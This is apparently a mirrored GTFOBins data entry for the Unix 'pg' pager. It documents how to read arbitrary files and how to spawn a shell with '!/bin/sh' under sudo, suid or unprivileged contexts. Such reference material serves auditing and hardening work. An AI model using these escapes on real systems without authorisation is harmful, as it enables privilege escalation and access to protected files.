1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/pg

20 lines
267 B
Plaintext

---
functions:
file-read:
- code: |-
pg /path/to/input-file
contexts:
sudo:
suid:
unprivileged:
shell:
- code: |-
pg /etc/hosts
!/bin/sh
contexts:
sudo:
suid:
shell: true
unprivileged:
...